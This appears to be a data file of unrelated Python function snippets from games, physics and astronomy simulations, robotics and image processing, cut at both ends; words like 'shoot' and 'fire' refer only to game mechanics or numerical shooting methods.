self.timer_fire = time.time()\n\n # decide starting position of fireball\n\n xPos = self.rect.centerx\n\n fire = powersC.Fireball((xPos, self.rect.centery), ang, self.direction)\n self.powerGroup.add(fire)", "def pickUpObject(player):\n for treasure in Treasure.List:\n distance2 = (treasure.x-player.x)*(treasure.x-player.x)+(treasure.y-player.y)*(treasure.y-player.y)\n if distance2 < 4 * (treasure.width * treasure.width+ treasure.height*treasure.height):\n if not player.treasureCaptured:\n player.treasureCaptured = True\n treasure.isCaptured = True\n treasure.showCaptured()", "def __init_ground(self, timeout=4):\n box_pose = geometry_msgs.msg.PoseStamped()\n box_pose.header.frame_id = self._robot.get_planning_frame()\n box_pose.pose.position.z = -0.025\n\n if self._ground_box_name not in self._scene.get_known_object_names():\n rospy.sleep(2)\n self._scene.add_box(self._ground_box_name, box_pose, size=(2, 2, 0.02))\n return self._wait_for_state_update(name=self._ground_box_name, is_known=True, timeout=timeout) \n else:\n self._loginfo(\"Box already in the Planning scene, skipping\")\n return True", "def sling_action():\n global mouse_distance\n global rope_lenght\n global angle\n global x_mouse\n global y_mouse\n # Fixing bird to the sling rope\n v = vector((sling_x, sling_y), (x_mouse, y_mouse))\n uv = unit_vector(v)\n uv1 = uv[0]\n uv2 = uv[1]\n # mouse_distance = distance(sling_x, sling_y, x_mouse, y_mouse)\n sling = Vec2d(sling_x, sling_y)\n mouse = Vec2d(x_mouse, y_mouse)\n mouse_distance = (sling - mouse).length\n\n pu = (uv1*rope_lenght+sling_x, uv2*rope_lenght+sling_y)\n bigger_rope = 102\n x_redbird = x_mouse - 20\n y_redbird = y_mouse - 20\n if mouse_distance > rope_lenght:\n pux, puy = pu\n pux -= 20\n puy -= 20\n pul = pux, puy\n screen.blit(redbird, pul)\n pu2 = (uv1*bigger_rope+sling_x, uv2*bigger_rope+sling_y)\n pygame.draw.line(screen, (0, 0, 0), (sling2_x, sling2_y), pu2, 5)\n screen.blit(redbird, pul)\n pygame.draw.line(screen, (0, 0, 0), (sling_x, sling_y), pu2, 5)\n else:\n mouse_distance += 10\n pu3 = (uv1*mouse_distance+sling_x, uv2*mouse_distance+sling_y)\n pygame.draw.line(screen, (0, 0, 0), (sling2_x, sling2_y), pu3, 5)\n screen.blit(redbird, (x_redbird, y_redbird))\n pygame.draw.line(screen, (0, 0, 0), (sling_x, sling_y), pu3, 5)\n # Angle of impulse\n dy = y_mouse - sling_y\n dx = x_mouse - sling_x\n if dx == 0:\n dx = 0.00000000000001\n angle = math.atan((float(dy))/dx)", "def box_collision_info(self):\r\n position = np.zeros((self.Npart,3)) # antall part, dim, iterasjoner\r\n position[:,:] = np.random.uniform(0,1e-6, size = (self.Npart,3))\r\n velocity = np.zeros((self.Npart,3))\r\n velocity[:,:] = np.random.normal(0,self.sigma,size = (self.Npart,3))\r\n\r\n part_collided = 0\r\n part_escaped = 0\r\n momentum = 0\r\n\r\n print 'engine started'\r\n for i in xrange(1,self.n):\r\n #collision\r\n position += velocity*dt\r\n l_hole = position[:,0:2] > self.L/4\r\n h_hole = position[:,0:2] < (3*self.L)/4\r\n pos_xy = np.logical_and(l_hole, h_hole)\r\n pos_xy = np.logical_and(pos_xy[:,0], pos_xy[:,1])\r\n pos_z = position[:,2] < 0\r\n esc_part = np.logical_and(pos_z, pos_xy)\r\n\r\n #velocity[esc_part] = velocity[esc_part]\r\n part_escaped += np.sum(esc_part)\r\n\r\n for j in xrange(0,3):\r\n impact_wall_pos = np.logical_and(position[:,j] > 0,\r\n position[:,j] < self.L)\r\n velocity[np.logical_not(impact_wall_pos),j] = -velocity[\r\n np.logical_not(impact_wall_pos),j]\r\n\r\n\r\n if j == 0:\r\n part_collided += np.sum(np.logical_not(impact_wall_pos),j)\r\n momentum += np.sum(2*self.m*abs(velocity[np.logical_not(\r\n impact_wall_pos),j]))\r\n\r\n\r\n\r\n position[position < 0] = 0\r\n position[position >self.L] = self.L\r\n\r\n particle_collided = part_collided/2\r\n return position, velocity,part_escaped, impact_wall_pos, particle_collided, momentum", "def shoot_bullets(self):\n\t\tBullet(self.birb.rect.x + 75, self.birb.rect.y + 35, self)", "async def play_shotgun(game_state) -> None:\n big_inside, lesser_counter = count_zombies(game_state)\n if big_inside and lesser_counter == 0:\n play_weapon(game_state, Supply.SHOTGUN, strong=True)\n elif lesser_counter <= 1 and not big_inside:\n play_weapon(game_state, Supply.SHOTGUN)\n elif lesser_counter > 1 and not big_inside:\n play_weapon(game_state, Supply.SHOTGUN, destroyed=False)\n play_weapon(game_state, Supply.SHOTGUN)\n else:\n message = 'What survivors should do [0/1]?\\n[0]: kill big zombie\\n' \\\n f'[1]: kill up to two lesser zombies ({lesser_counter} inside)\\n>'\n action = await get_action(game_state, message, ['0', '1'])\n if action == '0':\n play_weapon(game_state, Supply.SHOTGUN, strong=True)\n elif lesser_counter == 1:\n play_weapon(game_state, Supply.SHOTGUN)\n else:\n play_weapon(game_state, Supply.SHOTGUN, destroyed=False)\n play_weapon(game_state, Supply.SHOTGUN)", "def track_treasures(self, boom_pos):\n treasures = self.gui.map.get_treasures()\n for treasure in treasures:\n if self.if_near_boom(treasure.get_pos(), boom_pos):\n treasure.switch_img()", "def pulse(relay_controller, debug):\n if debug >= BASIC:\n print \"Boxes.%s\" % inspect.currentframe().f_code.co_name\n FlashEffects.pulse(relay_controller, constants.CH_ALL_BOXES)", "def setBox(self, box: Vector):\r\n if not isinstance(box, Vector):\r\n raise TypeError(\"Box Property should be a vector\")\r\n\r\n if self._fixture is not None:\r\n while kge.Physics.world.locked:\r\n continue\r\n\r\n self._box = box\r\n self._fixture.shape.box = *self._box,", "def shoot(self, a_fighter):\n if self.get_ammos()>0:\n lostPoints = int(self.get_damage() / a_fighter.get_agility())\n lostPoints = int(lostPoints * uniform(0.5,1)) # some random added\n a_fighter.__health_points = a_fighter.get_health_points() - lostPoints\n self.__ammos -= 1 # remove one ammo\n return a_fighter.get_health_points()", "def img_show_unit_ball(img):\n side = int(np.sqrt(img.shape[0]))\n plt.imshow(img.reshape(side, side) / np.linalg.norm(img))\n plt.show()", "def run(self):\n ball = memory.world_objects.getObjPtr(core.WO_BALL)\n if not ball.seen or not ball.fromTopCamera:\n return\n \n # Ball coordinates\n ball_x, ball_y = ball.imageCenterX, ball.imageCenterY\n \n # Calculate forward velocity\n ball_distance = ball.visionDistance / 1000\n print('Ball distance: {}'.format(ball_distance))\n ball_distance = min(ball_distance, DISTANCE_THRESHOLD)\n \n # Cache the ball distances\n PursueBall.ball_distances = (PursueBall.ball_distances + [ball_distance])[-30:]\n print('Ball distances: {}'.format(PursueBall.ball_distances))\n slope = sum(PursueBall.ball_distances[-10:])/10 - sum(PursueBall.ball_distances[:10])/10\n print('Slope: {} - {} = {}'.format(sum(PursueBall.ball_distances[-10:]) / 10,\n sum(PursueBall.ball_distances[:10]) / 10,\n slope))\n print('Input: {}'.format(1 / slope if slope else 1))\n \n \n # Get the maximum velocity to be 1\n forward_vel = ball_distance * DISTANCE_CONSTANT\n forward_vel *= MAX_FORWARD_VELOCITY\n forward_vel = max(MIN_FORWARD_VELOCITY, forward_vel)\n print('forward velocity: {}'.format(forward_vel))\n \n # Calculate sideways velocity\n angular_vel = -(ball_x-160.0) / 160.0 * MAX_ANGULAR_VELOCITY\n print('Sideways Amount: {}'.format(angular_vel))\n \n commands.setWalkVelocity(forward_vel, 0, angular_vel)", "def add_soot(image: Image, fract: float = 0.1) -> Image:\n data = np.array(image).copy()\n\n shape = data.shape\n data = data.flatten()\n how_many = int(data.size * fract)\n mask = np.random.choice(data.size, how_many)\n data[mask] = 0\n data = data.reshape(shape)\n\n image = Image.fromarray(data)\n return image", "def checkball(self):\r\n for ball in self.overlapping_sprites:\r\n ball.bottom=self.top\r\n if math.fabs(ball.x-self.x)<math.fabs(ball.x-self.left) and math.fabs(ball.x-self.x)<math.fabs(ball.x-self.right):\r\n ball.vertbounce()\r\n if math.fabs(ball.x-self.left)<math.fabs(ball.x-self.x) and math.fabs(ball.x-self.left)<math.fabs(ball.x-self.right):\r\n ball.leftbounce()\r\n if math.fabs(ball.x-self.right)<math.fabs(ball.x-self.left) and math.fabs(ball.x-self.right)<math.fabs(ball.x-self.x):\r\n ball.rightbounce()\r\n self.points.value+=10\r\n if self.points.value==500:\r\n ball.ballchange()\r\n elif self.points.value==2000:\r\n ball.ballchange()\r\n elif self.points.value==4500:\r\n ball.ballchange()\r\n elif self.points.value==10000:\r\n ball.ballchange()", "def __init__(self, trigbox = None, mychan = 2, V2mA = 1.0):\r\n if not trigbox:\r\n from Caio import TriggerBox\r\n trigbox = TriggerBox.TTL()\r\n self.trigbox = trigbox\r\n self.my_chan = mychan-1 #Base 0.\r\n self.V2mA = float(V2mA) #5.0 = 10V:50mA\r\n self.intensity = 0", "def testEllipticalGaussian(self):\n #\n # Make and the objects\n #\n ab_vals = [(1.0, 0.0), (2.0, 0.0), (2.0, 0.1), ]\n nIter = 2\n for dx in (0.0, 0.5,):\n for dy in (0.0, 0.5,):\n for alpha, b in ab_vals:\n for objFlux in (1e2, 1e3, 1e4, 1e5, 1e6, ):\n flux, fluxErr, flags, psfFlux = self.makeAndMeasure(objFlux, alpha, b, dx=dx, dy=dy)\n \n failFlux = math.isnan(flux) or flags or abs(flux/objFlux - 1) > 0.25e-2\n \n ID = \"alpha,b %4.1f, %5.2f dx,dy = %.1f,%.1f \" % (alpha, b, dx, dy)\n msg = \"%s flux_DeconvolvedPsf: %9.4g v. exact value %9.4g (error %5.2f%%) (psfFlux error %5.2f%%)\" % \\\n (ID, flux, objFlux, 100*(flux/objFlux - 1), 100*(psfFlux/objFlux - 1))\n\n if False:\n print msg\n continue\n\n self.assertFalse(failFlux, msg)", "def test_WIMP_cut_region_on_true_data(bolo_name, mass, analysis):\n\t\n\n\t#Load 2D PDF\n\tfWIMP2D, f = PyRPl.open_ROOT_object(\"./ROOT_files/WIMP_PDF2D_\" + analysis + \".root\", \"WIMP_\" + mass + \"_GeV\")\n\n\t#Load cut value on PDF for 95% WIMP box\n\tcut_val_90, cut_val_99 = 0,0\n\twith open (\"./Text_files/WIMP_PDF_90_and_99_cut_value_\" + analysis + \".txt\", \"r\") as fcut:\n\t\tstuff = [elem.rstrip().split(\",\") for elem in fcut.readlines()]\n\t\tfor elem in stuff:\n\t\t\tmass_val = elem[0]\n\t\t\tif int(mass)==int(mass_val):\n\t\t\t\tcut_val_90 = float(elem[1])\n\t\t\t\tcut_val_99 = float(elem[2])\n\t\n\n\tdata_path = \"/home/irfulx204/mnt/tmain/Desktop/Run308_Analyse_ERA/Fond_ERA_merged/\"\n\tfilou = TFile(data_path + bolo_name + \"_\" + analysis + \"_fond.root\", \"read\")\n\ttree = filou.Get(\"data\")\n\tnum_pass_cut =0\n\n\thpass = TH2F(\"hpass\", \"hpass\", 100, 0, 15, 100, 0, 15)\n\n\t# #T Check that the events are found where expected\n\t# arr1 = np.random.uniform(0,15,size=(200000,2))\n\t# for i in range(arr1.shape[0]):\n\t# \tPDF_val = fWIMP2D.Eval(arr1[i][0], arr1[i][1])\n\t# \tif (cut_val_99<PDF_val<cut_val_90):\n\t# \t# if (cut_val_99<PDF_val<cut_val_90):\n\t# \t\tnum_pass_cut+=1\n\t# \t\thpass.Fill(arr1[i][0], arr1[i][1])\t\t\n\n\t# hpass.Draw()\n\t# raw_input()\n\n\tfor k in range(tree.GetEntries()):\n\t\ttree.GetEntry(k)\n\t\tER=(1+8./3)*0.5*(tree.EC1+tree.EC2)-0.33*(1.5*tree.EIA+4*tree.EIB+1.5*tree.EIC+4*tree.EID)\n\t\tPDF_val = fWIMP2D.Eval(ER, 0.5*(tree.EIB+tree.EID))\n\t\tif (cut_val_99<PDF_val<cut_val_90 and 0.5*(tree.EIB+tree.EID)>0.7):\n\t\t# if (cut_val_99<PDF_val<cut_val_90):\n\t\t\tnum_pass_cut+=1\n\t\t\thpass.Fill(0.5*(tree.EC1+tree.EC2), 0.5*(tree.EIB+tree.EID))\n\n\tprint num_pass_cut\n\thpass.Draw()\n\traw_input()", "def stitch_img_result_pano(mam, mbm, diff, totalBox, prevBox, img_arrs, prevImg, prevNum, imgNum, min_matches=4, max_stdev=20, tmin=-10, tmax=40, verbose=True, rgb_query=False,inv=False):\n \n if verbose: print('Filt. matches: '+str(len(mam))+', stdev: ' + str(round(np.std(mam-mbm, axis=0).mean(),2)))\n # Filter for conditions\n if len(mam) > min_matches and np.std(mam-mbm, axis=0).mean() < max_stdev:\n # New box position before adjustment for expanding total box\n if rgb_query is not False:\n newBox=[int(np.round(prevBox[0]+diff[1])), int(np.round(prevBox[0]+diff[1]))+rgb_query.shape[0], int(np.round(prevBox[2]+diff[0])),int(np.round(prevBox[2]+diff[0]))+rgb_query.shape[1]] \n else: newBox=[int(np.round(prevBox[0]+diff[1])), int(np.round(prevBox[1]+diff[1])), int(np.round(prevBox[2]+diff[0])),int(np.round(prevBox[3]+diff[0]))] \n pos = [0,0] # Position for previously merged images\n modBox = [0,0,0,0] # Position for new image\n # If bounds on axis 0 go beyond total\n if newBox[0]<0 and newBox[1] > totalBox[0]:\n xmin, xmax = imgNum, imgNum\n modBox[1], modBox[0], pos[0] = newBox[1]-newBox[0], 0, abs(newBox[0])\n totalBox[0]=newBox[1]-min(newBox[0],0)\n elif newBox[0]<0:\n xmin = imgNum\n modBox[1], modBox[0], pos[0] = newBox[1]-newBox[0], 0, abs(newBox[0])\n totalBox[0]+=abs(newBox[0])\n elif newBox[1] > totalBox[0]:\n xmax = imgNum\n modBox[1], modBox[0] = newBox[1], newBox[0]\n totalBox[0]=newBox[1]\n else: modBox[0], modBox[1] = newBox[0], newBox[1] \n \n # If bounds on axis 1 go beyond total\n if newBox[2]<0 and newBox[3] > totalBox[1]:\n ymin, ymax = imgNum, imgNum\n modBox[3], modBox[2], pos[1] = newBox[3]-newBox[2], 0, abs(newBox[2])\n totalBox[1]=newBox[3]-min(newBox[2],0)\n elif newBox[2]<0:\n ymin = imgNum\n modBox[3], modBox[2], pos[1] = newBox[3]-newBox[2], 0, abs(newBox[2])\n totalBox[1]+=abs(newBox[2])\n elif newBox[3] > totalBox[1]:\n ymax = imgNum\n modBox[3], modBox[2] = newBox[3], newBox[2]\n totalBox[1] = newBox[3] #-min(newBox[2],0)\n else: modBox[2], modBox[3] = newBox[2], newBox[3]\n prevBox = modBox \n print(modBox)\n \n if len(img_arrs[1].shape) == 2:\n single = (img_arrs[1]-tmin)*255/tmax\n queryImg = np.dstack((single,single,single)).astype(np.uint8)\n else: queryImg = rgb_query\n result = np.zeros([totalBox[0],totalBox[1],3])\n if inv:\n result[modBox[0]:modBox[1], modBox[2]:modBox[3],:] = queryImg\n #prevImg.data[max(0,newBox[0]):min(newBox[1],prevImg.shape[0]), max(0,newBox[2]):min(newBox[3],prevImg.shape[1]),:] += np.array(queryImg[max(0,-newBox[0]):min(queryImg.shape[0],prevImg.shape[0]-max(newBox[0],0)), max(0,-newBox[2]):min(queryImg.shape[1],prevImg.shape[1]+max(-newBox[2],0)),:]*(prevImg.mask[max(0,newBox[0]):min(newBox[1],prevImg.shape[0]), max(0,newBox[2]):min(newBox[3],prevImg.shape[1]),:]))\n prevImg.data[max(newBox[0],0):min(newBox[1],prevImg.shape[0]), max(newBox[2],0):min(newBox[3],prevImg.shape[1]),:] += np.array(queryImg[-min(newBox[0],0):min(queryImg.shape[0],prevImg.shape[0]-newBox[0]), -min(newBox[2],0):min(queryImg.shape[1],prevImg.shape[1]-newBox[2]),:]*prevImg.mask[max(newBox[0],0):min(newBox[1],prevImg.shape[0]), max(newBox[2],0):min(newBox[3],prevImg.shape[1]),:])\n result[pos[0]:pos[0]+prevImg.shape[0],pos[1]:pos[1]+prevImg.shape[1],:] = prevImg \n else: \n result[pos[0]:pos[0]+prevImg.shape[0],pos[1]:pos[1]+prevImg.shape[1],:] = prevImg\n print(-min(newBox[0],0),min(queryImg.shape[0],prevImg.shape[0]-newBox[0]), -min(newBox[2],0),min(queryImg.shape[1],prevImg.shape[1]-newBox[2]))\n queryImg.data[-min(newBox[0],0):min(queryImg.shape[0],prevImg.shape[0]-newBox[0]), -min(newBox[2],0):min(queryImg.shape[1],prevImg.shape[1]-newBox[2])] += np.array(prevImg[max(0,newBox[0]):min(prevImg.shape[0],newBox[1]), max(0,newBox[2]):min(prevImg.shape[1],newBox[3]),:]*(queryImg.mask[-min(newBox[0],0):min(queryImg.shape[0],prevImg.shape[0]-newBox[0]), -min(newBox[2],0):min(queryImg.shape[1],prevImg.shape[1]-newBox[2])]))\n result[modBox[0]:modBox[1], modBox[2]:modBox[3],:] = queryImg\n print('Images {} and {} merged.'.format(str(prevNum),str(imgNum)))\n prevNum, prevImg = imgNum, result\n else: print('Images {} and {}, poor matching'.format(str(prevNum),str(imgNum)))\n return totalBox, prevNum, prevImg, prevBox", "def fire_bullet(self):\n if self.time_til_drop > 0:\n self.time_til_drop -= 1\n else:\n new_boss_projectile = BossProjectile(x = self.x)\n games.screen.add(new_boss_projectile)\n\n # set buffer to approx 30% of pizza height, regardless of pizza speed \n self.time_til_drop = int(new_boss_projectile.height * 1.3 / BossProjectile.speed) + 1", "def test_blackbody_overflow():\n photlam = u.photon / (u.cm ** 2 * u.s * u.AA)\n wave = [0.0, 1000.0, 100000.0, 1e55] # Angstrom\n temp = 10000.0 # Kelvin\n bb = BlackBody(temperature=temp * u.K, scale=1.0)\n with pytest.warns(\n AstropyUserWarning,\n match=r'Input contains invalid wavelength/frequency value\\(s\\)'):\n with np.errstate(all=\"ignore\"):\n bb_lam = bb(wave) * u.sr\n flux = bb_lam.to(photlam, u.spectral_density(wave * u.AA)) / u.sr\n\n # First element is NaN, last element is very small, others normal\n assert np.isnan(flux[0])\n with np.errstate(all=\"ignore\"):\n assert np.log10(flux[-1].value) < -134\n np.testing.assert_allclose(\n flux.value[1:-1], [0.00046368, 0.04636773], rtol=1e-3\n ) # 0.1% accuracy in PHOTLAM/sr\n with np.errstate(all=\"ignore\"):\n flux = bb(1.0 * u.AA)\n assert flux.value == 0", "def shooting(self):\r\n return not self.stopped", "def test_particles(snaptype):\n filename = DIR / snaptype.filename\n snap = plonk.load_snap(filename)\n\n snap.set_molecular_weight(2.381)\n\n _test_particles(snap=snap, ignore=False)\n _test_particles(snap=snap, ignore=True)\n\n snap.close_file()", "def __init__(self, box):\n self.is_hidden = False\n self.last_boxes = []\n self.best_box = None\n self.frames_undetected = 0\n self.age = 0\n self.n_frames = 10\n\n self.update(box)", "def draw_trigger_volume(world, actor):\n transform = actor.get_transform()\n tv = transform.transform(actor.trigger_volume.location)\n bbox = carla.BoundingBox(tv, actor.trigger_volume.extent)\n world.debug.draw_box(bbox, transform.rotation, life_time=1000)", "def test_run_homer(self):\n \n #foreground = clipper.test_file(\"clip_analysis_test_peak_results.bed.all.real.fa\")\n #background = clipper.test_file(\"clip_analysis_test_peak_results.bed.all.random.fa\")\n #run_homer(foreground, background)", "def aperture_phot(self,data,x,y,v):\n r = np.sqrt((x-self.avg_map_fits['Values'][1])**2 + (y-self.avg_map_fits['Values'][3])**2)\n \n inner = (r < 8./60.) & np.isfinite(data) \n outer = (r > 8.5/60.) & (r < 12./60.) & np.isfinite(data)\n\n annu = np.nanmedian(data[outer])\n annu_rms = np.nanstd(data[outer])\n flux = np.sum(data[inner]) - annu*np.sum(inner)\n\n c = 3e8\n kb=1.38e-23\n beam = (1./60.*np.pi/180.)**2\n factor = 2*kb*(v*1e9/c)**2 * beam * 1e26\n return flux*factor, annu_rms*np.sqrt(np.sum(inner))*factor", "def ship_shoot(ship, x, y):\n click.echo('Ship %s fires to %s,%s' % (ship, x, y))", "def b_s2o_freetime_shooter(meoe0, meoef, A, B, dt, shooterInfo):\n \n # -----------------------------------------------------------\n ## Initial Integration ##\n \n # Getting segement initial conditions\n IC_pert = np.hstack((meoe0, shooterInfo['m0']))\n tspan = [shooterInfo['t0'], dt]\n X_pert = odeint(shooterInfo['ode_burn'], IC_pert, tspan, \n args=shooterInfo['extras_burn'] + (A,B), \n rtol=shooterInfo['reltol'], atol=shooterInfo['abtol'])\n\n # Calculating Initial Error\n error_vec = []\n meoet = meoef[0:5]; beta = np.sqrt(dt)\n error_vec.append(X_pert[-1][0:5] - meoet)\n error_vec.append(dt - beta**2)\n error_vec = np.hstack(error_vec)\n error_mag = np.sqrt(error_vec.dot(error_vec))\n print('\\nInital Error:', '{:.4e}'.format(error_mag))\n # -----------------------------------------------------------\n\n # -----------------------------------------------------------\n ## Multiple Shooter ##\n\n # Preparing shooter\n IC_gnc = np.copy(IC_pert) # initial condition\n Xf_gnc = np.copy(X_pert[-1]) # final values maneuver, needed for finite differencing\n A_gnc = np.copy(A) # A BLT parameters\n B_gnc = np.copy(B) # B BLT parameters\n dt_gnc = np.copy(dt) # integration time of ms segments\n beta_gnc = np.copy(beta) # time slack variable\n \n tol = 1e-6; local_min = False\n count = 1; count_tol = 100; inner_count_tol = 5\n du_reduction = 10.; du_mod = 1.\n \n while True:\n \"\"\"\n This single-burn single shooter algorithm uses finite \n differencing to find Gamma, which maps changes in the control \n to changes in the error vector to null the error vector. The \n control vectors, error vectors, and Gamma (the Jacobian matrix \n de/du) are shown below.\n\n e = [p(tf) - pt u = [A\n f(tf) - ft B\n g(tf) - gt dt\n h(tf) - ht b ]\n k(tf) - kt \n dt - b^2]\n \n Calculated with Finite Differencing\n\n Gamma_(6x8) = de/du = [dp(tf)/dA dp(tf)/dB dp(tf)/ddt 0\n df(tf)/dA df(tf)/dB df(tf)/ddt 0\n dg(tf)/dA dg(tf)/dB dg(tf)/ddt 0\n dh(tf)/dA dh(tf)/dB dh(tf)/ddt 0\n dk(tf)/dA dk(tf)/dB dk(tf)/ddt 0\n 0 0 1 -2b1] \n \"\"\"\n # -------------------------------------------------------\n # Calculating Gamma\n\n m = 6; n = 8\n gamma = np.zeros((m,n))\n gamma[5,6] = 1. \n gamma[5,7] = -2*beta_gnc\n\n # Finite Differencing\n for j in range(n-1): # looping over u\n\n # Control Parameters\n IC_fd = np.copy(IC_gnc)\n A_fd = np.copy(A_gnc)\n B_fd = np.copy(B_gnc)\n dt_fd = np.copy(dt_gnc)\n\n # Perturbing Control Parameters (order: oes, A, B, dt)\n if 0 <= j < 3:\n # A BLT parameters\n fd_parameter = 1e-6*abs(A_fd[j]) + 1e-7\n A_fd[j] += fd_parameter\n elif 3 <= j < 6:\n # B BLT parameters\n fd_parameter = 1e-6*abs(B_fd[j-3]) + 1e-7\n B_fd[j-3] += fd_parameter\n else:\n # Time\n fd_parameter = 1e-6*abs(dt_fd) + 1e-7\n dt_fd += fd_parameter\n\n # Integration\n X_fd = odeint(shooterInfo['ode_burn'], IC_fd, [shooterInfo['t0'], dt_fd], \n args=shooterInfo['extras_burn'] + (A_fd, B_fd), \n rtol=shooterInfo['reltol'], atol=shooterInfo['abtol'])\n\n for k in range(m-1): # Looping over e\n diff = X_fd[-1][k] - Xf_gnc[k]\n gamma[k,j] = diff/fd_parameter\n # -------------------------------------------------------\n\n # -------------------------------------------------------\n # Correction\n\n # Finding nominal control correction\n gamma_inv = gamma.transpose() @ np.linalg.inv(gamma @ gamma.transpose())\n du = -np.dot(gamma_inv, error_vec)/du_mod\n\n print('\\nIt:', count, '|', 'Current Error:', '{:.4e}'.format(error_mag))\n\n # Finding Correction\n inner_count = 0\n error_test = [error_mag]\n while True:\n\n # Control Parameters\n IC_test = np.copy(IC_gnc)\n A_test = np.copy(A_gnc)\n B_test = np.copy(B_gnc)\n dt_test = np.copy(dt_gnc)\n beta_test = np.copy(beta_gnc)\n\n # Applying Updates\n A_test += du[0:3]\n B_test += du[3:6]\n dt_test += du[6]\n beta_test += du[7]\n\n # Integrating with new initial conditions\n X_test = odeint(shooterInfo['ode_burn'], IC_test, [shooterInfo['t0'], dt_test], \n args=shooterInfo['extras_burn'] + (A_test, B_test), \n rtol=shooterInfo['reltol'], atol=shooterInfo['abtol'])\n\n # Calculating new error\n error_vec = []\n error_vec.append(X_test[-1][0:5] - meoet)\n error_vec.append(dt_test - beta_test**2)\n error_vec = np.hstack(error_vec)\n error_check = np.sqrt(error_vec.dot(error_vec))\n\n inner_count += 1\n \n # Inner loop stopping conditions\n if inner_count > inner_count_tol:\n local_min = True\n break\n\n elif error_check/error_mag < 1:\n error_test.append(error_check)\n break\n\n elif error_check/error_mag >= 1:\n print('\\tReducing du by', du_reduction)\n du /= du_reduction\n\n error_mag = error_check\n IC_gnc = IC_test; Xf_gnc = X_test[-1]; A_gnc = A_test; B_gnc = B_test; dt_gnc = dt_test; beta_gnc = beta_test\n\n # Stopping Conditions\n if error_mag < tol:\n print('\\nSuccessful Convergence :)')\n break\n\n elif local_min:\n print('\\nUnsuccessful Convergence :(')\n break\n\n elif count > count_tol:\n print('\\nUnsuccessful Convergence :(')\n break\n\n count += 1\n # -------------------------------------------------------\n # -----------------------------------------------------------\n\n return [IC_gnc], [Xf_gnc], A_gnc, B_gnc, dt_gnc", "def test2(self):\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.initialize()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.sweepDuckie()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieAlignX()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieAlignY()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieLowerEE()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieSuctionOn()\r\n\t\tif not self._motion.breakout():\r\n\t\t\tself._motion.duckieLiftEE()\r\n\t\tself._motion.terminate()", "def start_shooting(agent):\n agent.step = Step.Shooting\n target = shooting_target(agent)\n speed = get_speed(agent, target)\n agent.drive.target = target\n agent.drive.speed = speed", "def morphology(seed=425, th=120):\n \n # impact parameters\n M = 1e8*u.Msun\n B = 19.85*u.kpc\n V = 220*u.km/u.s\n phi = coord.Angle(0*u.deg)\n theta = coord.Angle(th*u.deg)\n Tenc = 0.01*u.Gyr\n T = 0.5*u.Gyr\n dt = 0.1*u.Myr\n rs = 0*u.pc\n \n # potential parameters\n potential = 3\n Vh = 220*u.km/u.s\n q = 1*u.Unit(1)\n rhalo = 20*u.pc\n par_pot = np.array([Vh.si.value, q.value, rhalo.si.value])\n \n # setup tube\n Nstar = 3000\n wx = 30*u.kpc\n wy = 0*u.pc\n wz = 0*u.pc\n sx = 0*u.km/u.s\n \n np.random.seed(seed)\n \n xphi = np.linspace(-0.3*np.pi,0.3*np.pi, Nstar)\n xr = 20*u.kpc + np.random.randn(Nstar)*0.02*u.kpc\n x = np.sin(xphi) * xr\n y = np.cos(xphi) * xr\n z = x * 0\n vx = -np.cos(xphi) * Vh\n vy = np.sin(xphi) * Vh\n vz = vx * 0\n \n potential_perturb = 1\n par_perturb = np.array([M.si.value, 0., 0., 0.])\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, T.si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n\n plt.close()\n fig, ax = plt.subplots(3,1,figsize=(12,8), sharex=True)\n \n c_init = mpl.cm.Blues_r(1)\n c_fin0 = mpl.cm.Blues_r(0.5)\n c_fin = mpl.cm.Blues_r(0.2)\n \n eta = coord.Angle(np.arctan2(np.sqrt(stream['x'][0].to(u.kpc).value**2 + stream['x'][1].to(u.kpc).value**2),xr.to(u.kpc).value)*u.rad)\n xi = np.arctan2(stream['x'][1].to(u.kpc).value, stream['x'][0].to(u.kpc).value)\n xi = coord.Angle((xi - np.median(xi))*u.rad)\n \n vlabel = ['x', 'y', 'z']\n \n for i in range(3):\n plt.sca(ax[i])\n im = plt.scatter(xi.deg, eta.deg, c=stream['v'][i].value, s=20)\n \n plt.xlim(-60, 50)\n plt.ylim(55, 35)\n plt.gca().set_aspect('equal')\n \n if i==2:\n plt.xlabel('$\\phi_1$ [deg]')\n plt.ylabel('$\\phi_2$ [deg]')\n \n divider = make_axes_locatable(plt.gca())\n cax = divider.append_axes(\"right\", size=\"3%\", pad=0.1)\n plt.colorbar(im, cax=cax)\n plt.ylabel('$V_{{{}}}$ [km s$^{{-1}}$]'.format(vlabel[i]))\n \n plt.tight_layout()", "def setup_pwn(name,pwndata,phase, free_radius=5, tempdir=None, emin=1.0e2, emax=1.0e5,maxroi=10,model=None,**kwargs):\n sources=yaml.load(open(pwndata))\n\n catalog_name=sources[name]['catalog']\n ltcube=sources[name]['ltcube']\n pulsar_position=SkyDir(*sources[name]['dir'])\n ft2=sources[name]['ft2']\n ft1=sources[name]['ft1']\n\n # in case no list was passed\n if len(phase)==2 and isinstance(phase[0],numbers.Real) and \\\n isinstance(phase[1],numbers.Real):\n\n # write in case phase wraps around.\n if phase[0]>phase[1]:\n phase=[[phase[0],1.0],[0.0,phase[1]]]\n else:\n phase = [phase] \n\n phase_factor=get_phase_factor(phase)\n print \"phase\"\n print phase\n print \"phase_factor=%.2f\"%phase_factor\n\n catalog=FermiCatalog(e(\"$FERMI/catalogs/gll_psc_v02.fit\"),free_radius=free_radius)\n catalog_source=[i for i in catalog.get_sources(SkyDir(),180) if i.name==catalog_name][0]\n\n center=catalog_source.skydir\n\n if tempdir is None: tempdir=mkdtemp(prefix='/scratch/')\n\n binfile=j(tempdir,'binned_phased.fits')\n\n # apply phase cut to ft1 file\n phased_ft1 = j(tempdir,'ft1_phased.fits')\n phasetools.phase_cut(ft1,phased_ft1,phaseranges=phase)\n\n # create a temporary ltcube scaled by the phase factor\n# 